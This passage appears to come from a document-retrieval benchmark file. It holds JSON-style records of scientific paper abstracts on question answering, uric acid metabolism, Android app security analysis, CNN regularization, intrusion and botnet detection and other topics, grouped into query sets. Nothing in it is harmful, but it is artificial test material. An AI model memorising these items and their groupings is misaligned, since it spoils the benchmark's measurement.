"text": "We present a preliminary analysis of the use of WordNet hypernyms for answering “What-is” questions. We analyse the approximately 130 definitional questions in the TREC10 corpus with respect to our technique of Virtual Annotation (VA), which has previously been shown to be effective on the TREC9 definitional question set and other questions. We discover that VA is effective on a subset of the TREC10 definitional questions, but that some of these questions seem to need a user model to generate correct answers, or at least answers that agree with the NIST judges. Furthermore, there remains a large enough subset of definitional questions that cannot benefit at all from the WordNet isa-hierarchy, prompting the need to investigate alternative external resources.",
"title": ""
},
{
"docid": "f3c1f43cd345669a6cb5a7ba6f1ca94c",
"text": "Uric acid (UA) is the end product of purine metabolism and can reportedly act as an antioxidant. However, recently, numerous clinical and basic research approaches have revealed close associations of hyperuricemia with several disorders, particularly those comprising the metabolic syndrome. In this review, we first outline the two molecular mechanisms underlying inflammation occurrence in relation to UA metabolism; one is inflammasome activation by UA crystallization and the other involves superoxide free radicals generated by xanthine oxidase (XO). Importantly, recent studies have demonstrated the therapeutic or preventive effects of XO inhibitors against atherosclerosis and nonalcoholic steatohepatitis, which were not previously considered to be related, at least not directly, to hyperuricemia. Such beneficial effects of XO inhibitors have been reported for other organs including the kidneys and the heart. Thus, a major portion of this review focuses on the relationships between UA metabolism and the development of atherosclerosis, nonalcoholic steatohepatitis, and related disorders. Although further studies are necessary, XO inhibitors are a potentially novel strategy for reducing the risk of many forms of organ failure characteristic of the metabolic syndrome.",
"title": ""
},
{
"docid": "3ed927f16de87a753fd7c1cc2cce7cef",
"text": "The state-of-the-art in securing mobile software systems are substantially intended to detect and mitigate vulnerabilities in a single app, but fail to identify vulnerabilities that arise due to the interaction of multiple apps, such as collusion attacks and privilege escalation chaining, shown to be quite common in the apps on the market. This paper demonstrates COVERT, a novel approach and accompanying tool-suite that relies on a hybrid static analysis and lightweight formal analysis technique to enable compositional security assessment of complex software. Through static analysis of Android application packages, it extracts relevant security specifications in an analyzable formal specification language, and checks them as a whole for inter-app vulnerabilities. To our knowledge, COVERT is the first formally-precise analysis tool for automated compositional analysis of Android apps. Our study of hundreds of Android apps revealed dozens of inter-app vulnerabilities, many of which were previously unknown. A video highlighting the main features of the tool can be found at: http://youtu.be/bMKk7OW7dGg.",
"title": ""
},
{
"docid": "af7736d4e796d3439613ed06ca4e4b72",
"text": "The past few years have witnessed the fast development of different regularization methods for deep learning models such as fully-connected deep neural networks (DNNs) and Convolutional Neural Networks (CNNs). Most of previous methods mainly consider to drop features from input data and hidden layers, such as Dropout, Cutout and DropBlocks. DropConnect select to drop connections between fully-connected layers. By randomly discard some features or connections, the above mentioned methods control the overfitting problem and improve the performance of neural networks. In this paper, we proposed two novel regularization methods, namely DropFilter and DropFilter-PLUS, for the learning of CNNs. Different from the previous methods, DropFilter and DropFilter-PLUS selects to modify the convolution filters. For DropFilter-PLUS, we find a suitable way to accelerate the learning process based on theoretical analysis. Experimental results on MNISTshow that using DropFilter and DropFilter-PLUS may improve performance on image classification tasks.",
"title": ""
},
{
"docid": "55969912d37a5550953b954ba4efd7d3",
"text": "Apart from some general issues related to the Gender Identity Disorder (GID) diagnosis, such as whether it should stay in the DSM-V or not, a number of problems specifically relate to the current criteria of the GID diagnosis for adolescents and adults. These problems concern the confusion caused by similarities and differences of the terms transsexualism and GID, the inability of the current criteria to capture the whole spectrum of gender variance phenomena, the potential risk of unnecessary physically invasive examinations to rule out intersex conditions (disorders of sex development), the necessity of the D criterion (distress and impairment), and the fact that the diagnosis still applies to those who already had hormonal and surgical treatment. If the diagnosis should not be deleted from the DSM, most of the criticism could be addressed in the DSM-V if the diagnosis would be renamed, the criteria would be adjusted in wording, and made more stringent. However, this would imply that the diagnosis would still be dichotomous and similar to earlier DSM versions. Another option is to follow a more dimensional approach, allowing for different degrees of gender dysphoria depending on the number of indicators. Considering the strong resistance against sexuality related specifiers, and the relative difficulty assessing sexual orientation in individuals pursuing hormonal and surgical interventions to change physical sex characteristics, it should be investigated whether other potentially relevant specifiers (e.g., onset age) are more appropriate.",
"title": ""
},
{
"docid": "dd9d4b47ea4a43a5c228f7b0abb0ddd1",
"text": "Due to the growing popularity of Description Logics-based knowledge representation systems, predominantly in the context of Semantic Web applications, there is a rising demand for tools offering non-standard reasoning services. One particularly interesting form of reasoning, both from the user as well as the ontology engineering perspective, is abduction. In this paper we introduce two novel reasoning calculi for solving ABox abduction problems in the Description Logic ALC, i.e. problems of finding minimal sets of ABox axioms, which when added to the knowledge base enforce entailment of a requested set of assertions. The algorithms are based on regular connection tableaux and resolution with set-of-support and are proven to be sound and complete. We elaborate on a number of technical issues involved and discuss some practical aspects of reasoning with the methods.",
"title": ""
},
{
"docid": "308da592c92c2343ffdc460786cc46c9",
"text": "Electroluminescence (EL) imaging is a useful modality for the inspection of photovoltaic (PV) modules. EL images provide high spatial resolution, which makes it possible to detect even finest defects on the surface of PV modules. However, the analysis of EL images is typically a manual process that is expensive, time-consuming, and requires expert knowledge of many different types of defects. In this work, we investigate two approaches for automatic detection of such defects in a single image of a PV cell. The approaches differ in their hardware requirements, which are dictated by their respective application scenarios. The more hardware-efficient approach is based on hand-crafted features that are classified in a Support Vector Machine (SVM). To obtain a strong performance, we investigate and compare various processing variants. The more hardware-demanding approach uses an end-to-end deep Convolutional Neural Network (CNN) that runs on a Graphics Processing Unit (GPU). Both approaches are trained on 1,968 cells extracted from high resolution EL intensity images of monoand polycrystalline PV modules. The CNN is more accurate, and reaches an average accuracy of 88.42%. The SVM achieves a slightly lower average accuracy of 82.44%, but can run on arbitrary hardware. Both automated approaches make continuous, highly accurate monitoring of PV cells feasible.",
"title": ""
},
{
"docid": "f6df133663ab4342222d95a20cd09996",
"text": "Web 2.0 has led to the development and evolution of web-based communities and applications. These communities provide places for information sharing and collaboration. They also open the door for inappropriate online activities, such as harassment, in which some users post messages in a virtual community that are intentionally offensive to other members of the community. It is a new and challenging task to detect online harassment; currently few systems attempt to solve this problem. In this paper, we use a supervised learning approach for detecting harassment. Our technique employs content features, sentiment features, and contextual features of documents. The experimental results described herein show that our method achieves significant improvements over several baselines, including Term FrequencyInverse Document Frequency (TFIDF) approaches. Identification of online harassment is feasible when TFIDF is supplemented with sentiment and contextual feature attributes.",
"title": ""
},
{
"docid": "fcc7ef9f58038eead6e55b27b0cf5f0b",
"text": "Project managers aim at keeping track of interdependencies between various artifacts of the software development lifecycle, to find out potential requirements conflicts, to better understand the impact of change requests, and to fulfill process quality standards, such as CMMI requirements. While there are many methods and techniques on how to technically store requirements traces, the economic issues of dealing with requirements tracing complexity remain open. In practice tracing is typically not an explicit systematic process, but occurs rather ad hoc with considerable hidden tracing-related quality costs. This paper reports a case study on value-based requirements tracing (VBRT) that systematically supports project managers in tailoring requirements tracing precision and effort based on the parameters stakeholder value, requirements risk/volatility, and tracing costs. Main results of the case study were: (a) VBRT took around 35% effort of full requirements tracing; (b) more risky or volatile requirements warranted more detailed tracing because of their higher change probability.",
"title": ""
},
{
"docid": "20b28dd4a0717add4e032976a7946109",
"text": "In planning an s-curve speed profile for a computer numerical control (CNC) machine, centripetal acceleration and its derivative have to be considered. In a CNC machine, these quantities dictate how much voltage and current should be applied to servo motor windings. In this paper, the necessity of considering centripetal jerk in speed profile generation especially in the look-ahead mode is explained. It is demonstrated that the magnitude of centripetal jerk is proportional to the curvature derivative of the path known as \"sharpness\". It is also explained that a proper limited jerk motion is only possible when a G2-continuous machining path is planned. Then using a simplified mathematical representation of clothoids, a novel method for approximating a given path with a sequence of clothoid segments is proposed. Using this method, a semi-parallel G2-continuous path with adjustable deviation from the original shape for a sample machining contour is generated. Maximum permissible feed rate for the generated path is also calculated.",
"title": ""
},
{
"docid": "a2047969c4924a1e93b805b4f7d2402c",
"text": "Knowledge is a resource that is valuable to an organization's ability to innovate and compete. It exists within the individual employees, and also in a composite sense within the organization. According to the resourcebased view of the firm (RBV), strategic assets are the critical determinants of an organization's ability to maintain a sustainable competitive advantage. This paper will combine RBV theory with characteristics of knowledge to show that organizational knowledge is a strategic asset. Knowledge management is discussed frequently in the literature as a mechanism for capturing and disseminating the knowledge that exists within the organization. This paper will also explain practical considerations for implementation of knowledge management principles.",
"title": ""
},
{
"docid": "d3fbf7429dff6f68ec06014467b0217a",
"text": "This paper presents a hierarchical framework for detecting local and global anomalies via hierarchical feature representation and Gaussian process regression (GPR) which is fully non-parametric and robust to the noisy training data, and supports sparse features. While most research on anomaly detection has focused more on detecting local anomalies, we are more interested in global anomalies that involve multiple normal events interacting in an unusual manner, such as car accidents. To simultaneously detect local and global anomalies, we cast the extraction of normal interactions from the training videos as a problem of finding the frequent geometric relations of the nearby sparse spatio-temporal interest points (STIPs). A codebook of interaction templates is then constructed and modeled using the GPR, based on which a novel inference method for computing the likelihood of an observed interaction is also developed. Thereafter, these local likelihood scores are integrated into globally consistent anomaly masks, from which anomalies can be succinctly identified. To the best of our knowledge, it is the first time GPR is employed to model the relationship of the nearby STIPs for anomaly detection. Simulations based on four widespread datasets show that the new method outperforms the main state-of-the-art methods with lower computational burden.",
"title": ""
},
{
"docid": "304f4e48ac5d5698f559ae504fc825d9",
"text": "How the circadian clock regulates the timing of sleep is poorly understood. Here, we identify a Drosophila mutant, wide awake (wake), that exhibits a marked delay in sleep onset at dusk. Loss of WAKE in a set of arousal-promoting clock neurons, the large ventrolateral neurons (l-LNvs), impairs sleep onset. WAKE levels cycle, peaking near dusk, and the expression of WAKE in l-LNvs is Clock dependent. Strikingly, Clock and cycle mutants also exhibit a profound delay in sleep onset, which can be rescued by restoring WAKE expression in LNvs. WAKE interacts with the GABAA receptor Resistant to Dieldrin (RDL), upregulating its levels and promoting its localization to the plasma membrane. In wake mutant l-LNvs, GABA sensitivity is decreased and excitability is increased at dusk. We propose that WAKE acts as a clock output molecule specifically for sleep, inhibiting LNvs at dusk to promote the transition from wake to sleep.",
"title": ""
},
{
"docid": "31702c432c5bd1716599ca8a0aa54819",
"text": "Data sampling has been extensively studied for large scale graph mining. Many analyses and tasks become more efficient when performed on graph samples of much smaller size. The use of proxy objects is common in software engineering for analysis and interaction with heavy objects or systems. In this paper, we coin the term ’proxy graph’ and empirically investigate how well a proxy graph visualization can represent a big graph. Our investigation focuses on proxy graphs obtained by sampling; this is one of the most common proxy approaches. Despite the plethora of data sampling studies, this is the first evaluation of sampling in the context of graph visualization. For an objective evaluation, we propose a new family of quality metrics for visual quality of proxy graphs. Our experiments cover popular sampling techniques. Our experimental results lead to guidelines for using sampling-based proxy graphs in visualization.",
"title": ""
}
] | scidocsrr |
cdd33093cd376752c3f5f677bd5a53ea | Tree quantization for large-scale similarity search and classification | [
{
"docid": "f18c9cecdd3b7697af7c160906d6d501",
"text": "A new data structure for efficient similarity search in very large dataseis of high-dimensional vectors is introduced. This structure called the inverted multi-index generalizes the inverted index idea by replacing the standard quantization within inverted indices with product quantization. For very similar retrieval complexity and preprocessing time, inverted multi-indices achieve a much denser subdivision of the search space compared to inverted indices, while retaining their memory efficiency. Our experiments with large dataseis of SIFT and GIST vectors demonstrate that because of the denser subdivision, inverted multi-indices are able to return much shorter candidate lists with higher recall. Augmented with a suitable reranking procedure, multi-indices were able to improve the speed of approximate nearest neighbor search on the dataset of 1 billion SIFT vectors by an order of magnitude compared to the best previously published systems, while achieving better recall and incurring only few percent of memory overhead.",
"title": ""
}
] | [
{
"docid": "bcd7af5c474d931c0a76b654775396c2",
"text": "Task and motion planning subject to Linear Temporal Logic (LTL) specifications in complex, dynamic environments requires efficient exploration of many possible future worlds. Model-free reinforcement learning has proven successful in a number of challenging tasks, but shows poor performance on tasks that require long-term planning. In this work, we integrate Monte Carlo Tree Search with hierarchical neural net policies trained on expressive LTL specifications. We use reinforcement learning to find deep neural networks representing both low-level control policies and task-level “option policies” that achieve high-level goals. Our combined architecture generates safe and responsive motion plans that respect the LTL constraints. We demonstrate our approach in a simulated autonomous driving setting, where a vehicle must drive down a road in traffic, avoid collisions, and navigate an intersection, all while obeying rules of the road.",
"title": ""
},
{
"docid": "260c12152d9bd38bd0fde005e0394e17",
"text": "On the initiative of the World Health Organization, two meetings on the Standardization of Reporting Results of Cancer Treatment have been held with representatives and members of several organizations. Recommendations have been developed for standardized approaches to the recording of baseline data relating to the patient, the tumor, laboratory and radiologic data, the reporting of treatment, grading of acute and subacute toxicity, reporting of response, recurrence and disease-free interval, and reporting results of therapy. These recommendations, already endorsed by a number of organizations, are proposed for international acceptance and use to make it possible for investigators to compare validly their results with those of others.",
"title": ""
},
{
"docid": "1a154992369fc30c36613fc811df53ac",
"text": "Speech recognition is a subjective phenomenon. Despite being a huge research in this field, this process still faces a lot of problem. Different techniques are used for different purposes. This paper gives an overview of speech recognition process. Various progresses have been done in this field. In this work of project, it is shown that how the speech signals are recognized using back propagation algorithm in neural network. Voices of different persons of various ages",
"title": ""
},
{
"docid": "fc03ae4a9106e494d1b74451ca22190b",
"text": "With emergencies being, unfortunately, part of our lives, it is crucial to efficiently plan and allocate emergency response facilities that deliver effective and timely relief to people most in need. Emergency Medical Services (EMS) allocation problems deal with locating EMS facilities among potential sites to provide efficient and effective services over a wide area with spatially distributed demands. It is often problematic due to the intrinsic complexity of these problems. This paper reviews covering models and optimization techniques for emergency response facility location and planning in the literature from the past few decades, while emphasizing recent developments. We introduce several typical covering models and their extensions ordered from simple to complex, including Location Set Covering Problem (LSCP), Maximal Covering Location Problem (MCLP), Double Standard Model (DSM), Maximum Expected Covering Location Problem (MEXCLP), and Maximum Availability Location Problem (MALP) models. In addition, recent developments on hypercube queuing models, dynamic allocation models, gradual covering models, and cooperative covering models are also presented in this paper. The corresponding optimization X. Li (B) · Z. Zhao · X. Zhu Department of Industrial and Information Engineering, University of Tennessee, 416 East Stadium Hall, Knoxville, TN 37919, USA e-mail: Xueping.Li@utk.edu Z. Zhao e-mail: zzhao8@utk.edu X. Zhu e-mail: xzhu5@utk.edu T. Wyatt College of Nursing, University of Tennessee, 200 Volunteer Boulevard, Knoxville, TN 37996-4180, USA e-mail: twaytt@utk.edu",
"title": ""
},
{
"docid": "bbb08c98a2265c53ba590e0872e91e1d",
"text": "Reinforcement learning (RL) is one of the most general approaches to learning control. Its applicability to complex motor systems, however, has been largely impossible so far due to the computational difficulties that reinforcement learning encounters in high dimensional continuous state-action spaces. In this paper, we derive a novel approach to RL for parameterized control policies based on the framework of stochastic optimal control with path integrals. While solidly grounded in optimal control theory and estimation theory, the update equations for learning are surprisingly simple and have no danger of numerical instabilities as neither matrix inversions nor gradient learning rates are required. Empirical evaluations demonstrate significant performance improvements over gradient-based policy learning and scalability to high-dimensional control problems. Finally, a learning experiment on a robot dog illustrates the functionality of our algorithm in a real-world scenario. We believe that our new algorithm, Policy Improvement with Path Integrals (PI2), offers currently one of the most efficient, numerically robust, and easy to implement algorithms for RL in robotics.",
"title": ""
},
{
"docid": "0188bdf1c03995b6ae2218083864fc58",
"text": "We present a simple and effective scheme for dependency parsing which is based on bidirectional-LSTMs (BiLSTMs). Each sentence token is associated with a BiLSTM vector representing the token in its sentential context, and feature vectors are constructed by concatenating a few BiLSTM vectors. The BiLSTM is trained jointly with the parser objective, resulting in very effective feature extractors for parsing. We demonstrate the effectiveness of the approach by applying it to a greedy transition-based parser as well as to a globally optimized graph-based parser. The resulting parsers have very simple architectures, and match or surpass the state-of-the-art accuracies on English and Chinese.",
"title": ""
},
{
"docid": "823de62a3e823db782180f24a4f83bb4",
"text": "This paper presents ATL (ATLAS Transformation Language): a hybrid model transformation language that allows both declarative and imperative constructs to be used in transformation definitions. The paper describes the language syntax and semantics by using examples. ATL is supported by a set of development tools such as an editor, a compiler, a virtual machine, and a debugger. A case study shows the applicability of the language constructs. Alternative ways for implementing the case study are outlined. In addition to the current features, the planned future ATL features are briefly",
"title": ""
},
{
"docid": "ca44496c768cfc73075c31a4fc010d4d",
"text": "The most downloaded articles from ScienceDirect in the last 90 days.",
"title": ""
},
{
"docid": "2aefddf5e19601c8338f852811cebdee",
"text": "This paper presents a system that allows online building of 3D wireframe models through a combination of user interaction and automated methods from a handheld camera-mouse. Crucially, the model being built is used to concurrently compute camera pose, permitting extendable tracking while enabling the user to edit the model interactively. In contrast to other model building methods that are either off-line and/or automated but computationally intensive, the aim here is to have a system that has low computational requirements and that enables the user to define what is relevant (and what is not) at the time the model is being built. OutlinAR hardware is also developed which simply consists of the combination of a camera with a wide field of view lens and a wheeled computer mouse.",
"title": ""
},
{
"docid": "72c0770dc42a2df67324df95ae4255a9",
"text": "| Integrating a large number of Web information sources may signiicantly increase the utility of the WorldWide Web. A promising solution to the integration is through the use of a Web Information mediator that provides seamless, transparent access for the clients. Information mediators need wrappers to access a Web source as a structured database, but building wrappers by hand is impractical. Previous work on wrapper induction is too restrictive to handle a large number of Web pages that contain tuples with missing attributes, multiple values, variant attribute permutations, exceptions and typos. This paper presents SoftMealy, a novel wrapper representation formalism. This representation is based on a nite-state transducer (FST) and contextual rules. This approach can wrap a wide range of semistructured Web pages because FSTs can encode each diierent attribute permutation as a path. A SoftMealy wrapper can be induced from a handful of labeled examples using our generalization algorithm. We have implemented this approach into a prototype system and tested it on real Web pages. The performance statistics shows that the sizes of the induced wrappers as well as the required training eeort are linear with regard to the structural variance of the test pages. Our experiment also shows that the induced wrappers can generalize over unseen pages.",
"title": ""
},
{
"docid": "2dbe7746af8385e316ec42f461608c08",
"text": "Many existing deep learning models for natural language processing tasks focus on learning the compositionality of their inputs, which requires expensive computations and long training times. We present a simple deep neural network that competes with and, in some cases, outperforms such models on sentiment analysis and factoid question answering tasks while taking only a fraction of the training time. While our model is syntactically-ignorant, we show significant improvements over previous bag-of-words models by deepening our network, applying a novel variant of dropout, and initializing with pretrained word embeddings. Moreover, our model performs better than syntactic models on datasets with high syntactic variance. Our results indicate that for the tasks we consider, nonlinearly transforming the input is more important than tailoring a network to model word order and syntax.",
"title": ""
},
{
"docid": "97202b135a3c4d641b6ffe8f36778619",
"text": "This paper proposes a new method for human posture recognition from top-view depth maps on small training datasets. There are two strategies developed to leverage the capability of convolution neural network (CNN) in mining the fundamental and generic features for recognition. First, the early layers of CNN should serve the function to extract feature without specific representation. By applying the concept of transfer learning, the first few layers from the pre-learned VGG model can be used directly without further fine-tuning. To alleviate the computational loading and to increase the accuracy of our partially transferred model, a cross-layer inheriting feature fusion (CLIFF) is proposed by using the information from the early layer in fully connected layer without further processing. The experimental result shows that combination of partial transferred model and CLIFF can provide better performance than VGG16 [1] model with re-trained FC layer and other hand-crafted features like RBPs [2].",
"title": ""
},
{
"docid": "f31138cf18018ef2df82cc121f6f2721",
"text": "In this paper, we present EPCBC, a lightweight cipher that has 96-bit key size and 48-bit/96-bit block size. This is suitable for Electronic Product Code (EPC) encryption, which uses low-cost passive RFID-tags and exactly 96 bits as a unique identifier on the item level. EPCBC is based on a generalized PRESENT with block size 48 and 96 bits for the main cipher structure and customized key schedule design which provides strong protection against related-key differential attacks, a recent class of powerful attacks on AES. Related-key attacks are especially relevant when a block cipher is used as a hash function. In the course of proving the security of EPCBC, we could leverage on the extensive security analyses of PRESENT, but we also obtain new results on the differential and linear cryptanalysis bounds for the generalized PRESENT when the block size is less than 64 bits, and much tighter bounds otherwise. Further, we analyze the resistance of EPCBC against integral cryptanalysis, statistical saturation attack, slide attack, algebraic attack and the latest higher-order differential cryptanalysis from FSE 2011 [11]. Our proposed cipher would be the most efficient at EPC encryption, since for other ciphers such as AES and PRESENT, it is necessary to encrypt 128-bit blocks (which results in a 33% overhead being incurred). The efficiency of our proposal therefore leads to huge market implications. Another contribution is an optimized implementation of PRESENT that is smaller and faster than previously published results.",
"title": ""
},
{
"docid": "d23df7fd9a9a0e847604bbdbe8ce04e8",
"text": "In this paper, we propose and implement a hybrid model combining two-directional two-dimensional principal component analysis ((2D)2PCA) and a Radial Basis Function Neural Network (RBFNN) to forecast stock market behavior. First, 36 stock market technical variables are selected as the input features, and a sliding window is used to obtain the input data of the model. Next, (2D)2PCA is utilized to reduce the dimension of the data and extract its intrinsic features. Finally, an RBFNN accepts the data processed by (2D)2PCA to forecast the next day's stock price or movement. The proposed model is used on the Shanghai stock market index, and the experiments show that the model achieves a good level of fitness. The proposed model is then compared with one that uses the traditional dimension reduction method principal component analysis (PCA) and independent component analysis (ICA). The empirical results show that the proposed model outperforms the PCA-based model, as well as alternative models based on ICA and on the multilayer perceptron.",
"title": ""
},
{
"docid": "7c89edeaffe5017adbfd1e4f810e2af8",
"text": "BACKGROUND\nAmbrisentan is a propanoic acid-based, A-selective endothelin receptor antagonist for the once-daily treatment of pulmonary arterial hypertension.\n\n\nMETHODS AND RESULTS\nAmbrisentan in Pulmonary Arterial Hypertension, Randomized, Double-Blind, Placebo-Controlled, Multicenter, Efficacy Study 1 and 2 (ARIES-1 and ARIES-2) were concurrent, double-blind, placebo-controlled studies that randomized 202 and 192 patients with pulmonary arterial hypertension, respectively, to placebo or ambrisentan (ARIES-1, 5 or 10 mg; ARIES-2, 2.5 or 5 mg) orally once daily for 12 weeks. The primary end point for each study was change in 6-minute walk distance from baseline to week 12. Clinical worsening, World Health Organization functional class, Short Form-36 Health Survey score, Borg dyspnea score, and B-type natriuretic peptide plasma concentrations also were assessed. In addition, a long-term extension study was performed. The 6-minute walk distance increased in all ambrisentan groups; mean placebo-corrected treatment effects were 31 m (P=0.008) and 51 m (P<0.001) in ARIES-1 for 5 and 10 mg ambrisentan, respectively, and 32 m (P=0.022) and 59 m (P<0.001) in ARIES-2 for 2.5 and 5 mg ambrisentan, respectively. Improvements in time to clinical worsening (ARIES-2), World Health Organization functional class (ARIES-1), Short Form-36 score (ARIES-2), Borg dyspnea score (both studies), and B-type natriuretic peptide (both studies) were observed. No patient treated with ambrisentan developed aminotransferase concentrations >3 times the upper limit of normal. In 280 patients completing 48 weeks of treatment with ambrisentan monotherapy, the improvement from baseline in 6-minute walk at 48 weeks was 39 m.\n\n\nCONCLUSIONS\nAmbrisentan improves exercise capacity in patients with pulmonary arterial hypertension. Improvements were observed for several secondary end points in each of the studies, although statistical significance was more variable. Ambrisentan is well tolerated and is associated with a low risk of aminotransferase abnormalities.",
"title": ""
},
{
"docid": "ab6668e9c2d35cdb1a359c77b2de2a03",
"text": "This paper discusses the question whether online retailers can diversify from their competitors by reaching out to new delivery concepts for last mile logistics. We choose an empirical study to ask 250 potential online consumers about their opinion and preferences of online trading and last mile delivery to show the importance of new delivery strategies in order to deal with the rising challenges of high growth rates in E-Commerce business for retailers and logistic service providers.",
"title": ""
},
{
"docid": "d225b334a1feff4326e7a5779b50267f",
"text": "We compare the fast training and decoding speed of RETURNN of attention models for translation, due to fast CUDA LSTM kernels, and a fast pure TensorFlow beam search decoder. We show that a layer-wise pretraining scheme for recurrent attention models gives over 1% BLEU improvement absolute and it allows to train deeper recurrent encoder networks. Promising preliminary results on max. expected BLEU training are presented. We obtain state-of-the-art models trained on the WMT 2017 German↔English translation task. We also present end-to-end model results for speech recognition on the Switchboard task. The flexibility of RETURNN allows a fast research feedback loop to experiment with alternative architectures, and its generality allows to use it on a wide range of applications.",
"title": ""
},
{
"docid": "8411c13863aeb4338327ea76e0e2725b",
"text": "There is often the need to update an installed Intrusion Detection System (IDS) due to new attack methods or upgraded computing environments. Since many current IDSs are constructed by manual encoding of expert security knowledge, changes to IDSs are expensive and slow. In this paper, we describe a data mining framework for adaptively building Intrusion Detection (ID) models. The central idea is to utilize auditing programs to extract an extensive set of features that describe each network connection or host session, and apply data mining programs to learn rules that accurately capture the behavior of intrusions and normal activities. These rules can then be used for misuse detection and anomaly detection. Detection models for new intrusions or specific components of a network system are incorporated into an existing IDS through a meta-learning (or co-operative learning) process, which produces a meta detection model that combines evidence from multiple models. We discuss the strengths of our data mining programs, namely, classification, meta-learning, association rules, and frequent episodes. We report our results of applying these programs to the (extensively gathered) network audit data from the DARPA Intrusion Detection Evaluation Program.",
"title": ""
},
{
"docid": "47d0f4f76d809ccc88a84a2abed4a1ce",
"text": "Detecting unintended falls is essential for ambient intelligence and healthcare of elderly people living alone. In recent years, deep convolutional nets are widely used in human action analysis, based on which a number of fall detection methods have been proposed. Despite their highly effective performances, the behaviors of how the convolutional nets recognize falls are still not clear. In this paper, instead of proposing a novel approach, we perform a systematical empirical study, attempting to investigate the underlying fall recognition process. We propose four tasks to investigate, which involve five types of input modalities, seven net instances and different training samples. The obtained quantitative and qualitative results reveal the patterns that the nets tend to learn, and several factors that can heavily influence the performances on fall recognition. We expect that our conclusions are favorable to proposing better deep learning solutions to fall detection systems.",
"title": ""
},
{
"docid": "61c4146ac8b55167746d3f2b9c8b64e8",
"text": "In a variety of Network-based Intrusion Detection System (NIDS) applications, one desires to detect groups of unknown attack (e.g., botnet) packet-flows, with a group potentially manifesting its atypicality (relative to a known reference “normal”/null model) on a low-dimensional subset of the full measured set of features used by the IDS. What makes this anomaly detection problem quite challenging is that it is a priori unknown which (possibly sparse) subset of features jointly characterizes a particular application, especially one that has not been seen before, which thus represents an unknown behavioral class (zero-day threat). Moreover, nowadays botnets have become evasive, evolving their behavior to avoid signature-based IDSes. In this work, we apply a novel active learning (AL) framework for botnet detection, facilitating detection of unknown botnets (assuming no ground truth examples of same). We propose a new anomaly-based feature set that captures the informative features and exploits the sequence of packet directions in a given flow. Experiments on real world network traffic data, including several common Zeus botnet instances, demonstrate the advantage of our proposed features and AL system.",
"title": ""
}
] | scidocsrr |
2f600546a7f938b6d0ba270ce55e5fc2 | Using Mise-En-Scène Visual Features based on MPEG-7 and Deep Learning for Movie Recommendation | [
{
"docid": "1014b49b41b573cb81d50f6e8123c894",
"text": "There is much video available today. To help viewers find video of interest, work has begun on methods of automatic video classification. In this paper, we survey the video classification literature. We find that features are drawn from three modalities - text, audio, and visual - and that a large variety of combinations of features and classification have been explored. We describe the general features chosen and summarize the research in this area. We conclude with ideas for further research.",
"title": ""
},
{
"docid": "e3b7d2c4cd3e3d860db8d4751c9eed25",
"text": "While recommender systems tell users what items they might like, explanations of recommendations reveal why they might like them. Explanations provide many benefits, from improving user satisfaction to helping users make better decisions. This paper introduces tagsplanations, which are explanations based on community tags. Tagsplanations have two key components: tag relevance, the degree to which a tag describes an item, and tag preference, the user's sentiment toward a tag. We develop novel algorithms for estimating tag relevance and tag preference, and we conduct a user study exploring the roles of tag relevance and tag preference in promoting effective tagsplanations. We also examine which types of tags are most useful for tagsplanations.",
"title": ""
}
] | [
{
"docid": "088011257e741b8d08a3b44978134830",
"text": "This paper deals with the kinematic and dynamic analyses of the Orthoglide 5-axis, a five-degree-of-freedom manipulator. It is derived from two manipulators: i) the Orthoglide 3-axis; a three dof translational manipulator and ii) the Agile eye; a parallel spherical wrist. First, the kinematic and dynamic models of the Orthoglide 5-axis are developed. The geometric and inertial parameters of the manipulator are determined by means of a CAD software. Then, the required motors performances are evaluated for some test trajectories. Finally, the motors are selected in the catalogue from the previous results.",
"title": ""
},
{
"docid": "46360fec3d7fa0adbe08bb4b5bb05847",
"text": "Previous approaches to action recognition with deep features tend to process video frames only within a small temporal region, and do not model long-range dynamic information explicitly. However, such information is important for the accurate recognition of actions, especially for the discrimination of complex activities that share sub-actions, and when dealing with untrimmed videos. Here, we propose a representation, VLAD for Deep Dynamics (VLAD3), that accounts for different levels of video dynamics. It captures short-term dynamics with deep convolutional neural network features, relying on linear dynamic systems (LDS) to model medium-range dynamics. To account for long-range inhomogeneous dynamics, a VLAD descriptor is derived for the LDS and pooled over the whole video, to arrive at the final VLAD3 representation. An extensive evaluation was performed on Olympic Sports, UCF101 and THUMOS15, where the use of the VLAD3 representation leads to state-of-the-art results.",
"title": ""
},
{
"docid": "91c5e41422817f181d974ceab0117d7b",
"text": "BACKGROUND\nIn recent years, the rate of peritonitis during continuous ambulatory peritoneal dialysis (CAPD) has been significantly reduced. However, peritonitis remains a major complication of CAPD, accounting for considerable mortality and hospitalization among CAPD patients.\n\n\nOBJECTIVE\nTo generate a \"center tailored\" treatment protocol for CAPD peritonitis by examining the changes of causative organisms and their susceptibilities to antimicrobial agents over the past 10 years.\n\n\nMETHOD\nRetrospective review of the medical records of 1015 CAPD patients (1108 episodes of peritonitis) who were followed up from 1992 through 2001.\n\n\nRESULTS\nThe overall incidence of peritonitis was 0.40 episodes/patient-year. The annual rate of peritonitis and the incidence of peritonitis caused by a single gram-positive organism were significantly higher in 1992 and 1993 compared with those in the rest of the years (p < 0.05). The incidence of peritonitis due to coagulase-negative staphylococcus (CoNS) decreased significantly over time, whereas there was no significant change in the incidence of Staphylococcus aureus (SA)-induced peritonitis. Among CoNS, resistance to methicillin increased from 18.4% in 1992-1993 to 41.7% in 2000-2001 (p < 0.05). In contrast, the incidence of methicillin-resistant SA was not different according to the calendar year. Catheter removal rates were significantly higher in peritonitis due to a single gram-negative organism (16.6%) compared with gram-positive peritonitis (4.8%, p < 0.005). The mortality associated with peritonitis was also higher in gram-negative (3.7%) compared with gram-positive peritonitis (1.4%), but there was no statistical significance. Among single gram-positive organism-induced peritonitis, catheter removal rates were significantly higher in SA (9.3%) than those in CoNS (2.9%, p < 0.01) and other gram-positive organisms (2.9%, p < 0.05). In peritonitis caused by CoNS, the methicillin-resistant group showed significantly higher removal rates than the methicillin-susceptible group (8.2% vs 1.0%, p < 0.01).\n\n\nCONCLUSION\nThe incidence of peritonitis for 2001 decreased to less than half that for 1992, due mainly to a significant decrease in CoNS-induced peritonitis, whereas the proportions of peritonitis due to a single gram-negative organism and methicillin-resistant CoNS increased. These findings suggest that it is necessary to prepare new center-based guidelines for the initial empirical treatment of CAPD peritonitis.",
"title": ""
},
{
"docid": "840919760f5cc4839fe027d3a744dbd3",
